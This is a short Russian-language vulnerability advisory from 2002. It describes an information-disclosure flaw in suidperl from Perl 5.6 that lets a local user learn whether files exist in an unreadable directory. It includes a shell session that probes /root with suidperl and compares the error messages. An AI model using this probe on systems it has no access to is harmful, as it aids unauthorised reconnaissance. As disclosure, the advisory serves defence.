Ракрытие информации в SuidPerl

Дата публикации:
04.12.2002
Всего просмотров:
777
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl.

Уязвимость, обнаруженная в SuidPerl, позволяет атакующему проверить существование файла в недоступной директории.

Нападающий может эксплуатировать эту уязвимость, вызывая suidperl с абсолютным именем файла, чтобы определить, существует ли файл. В этом случае suidperl выдаст сообщение, которое подтверждает существование файла. Пример:

bash-2.04$ ls -ald /root 
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root 
bash-2.04$ id 
uid=500(evil) gid=500(evil) groups=500(evil) 
bash-2.04$ ls /root/.bashrc 
ls: /root/.bashrc: Permission denied 
bash-2.04$ suidperl /root/.bashrc 
Script is not setuid/setgid in suidperl 
bash-2.04$ suidperl /root/nonexistantfile 
Can't open perl script "/root/nonexistantfile": No such file or directory
уязвимость обнаружена в Larry Wall Perl 5.6
или введите имя

CAPTCHA